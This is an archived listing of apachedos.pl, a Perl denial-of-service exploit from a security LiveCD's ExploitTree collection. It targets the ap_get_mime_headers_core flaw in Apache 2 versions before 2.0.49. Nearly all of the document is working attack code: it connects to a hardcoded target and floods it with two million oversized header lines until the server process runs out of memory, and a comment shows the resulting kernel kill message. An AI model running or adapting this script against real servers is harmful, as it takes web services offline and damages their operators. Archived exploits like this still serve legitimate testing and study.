home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / apachedos.pl < prev    next >
Text File  |  2005-02-12  |  1KB  |  41 lines
  1. #/usr/bin/perl
  2. #
  3. #exploit for apache ap_get_mime_headers_core() vuln
  4. #
  5. #adv is here: http://www.guninski.com/httpd1.html
  6. #
  7. #version: apache 2 <2.0.49 apache 1 not tested.
  8. #
  9. #by bkbll bkbll#cnhonker.net http://www.cnhonker.com
  10. #
  11. #tail -f /var/log/messages
  12. #Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
  13. #
  14.  
  15. use IO::Socket::INET;
  16.  
  17. $host="10.10.10.114";
  18. $port=80;
  19. $sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die "new error$@\n";
  20. binmode($sock);
  21. $hostname="Host: $host";
  22. $buf2='A'x50;
  23. $buf4='A'x8183;
  24. $len=length($buf2);
  25. $buf="GET / HTTP/1.1\r\n";
  26. send($sock,$buf,0) || die "send error:$@\n";
  27. for($i= 0; $i < 2000000; $i++)
  28. {
  29.     $buf=" $buf4\r\n";
  30.     send($sock,$buf,0) || die "send error:$@, target maybe have been D.o.S?\n";
  31. }
  32. $buf="$hostname\r\n";
  33. $buf.="Content-Length: $len\r\n";
  34.  
  35. $buf.="\r\n";
  36. $buf.=$buf2."\r\n\r\n";
  37.  
  38. send($sock,$buf,0) || die "send error:$@\n";
  39. print "Ok, our buffer have send to target \n";
  40. close($sock);
  41.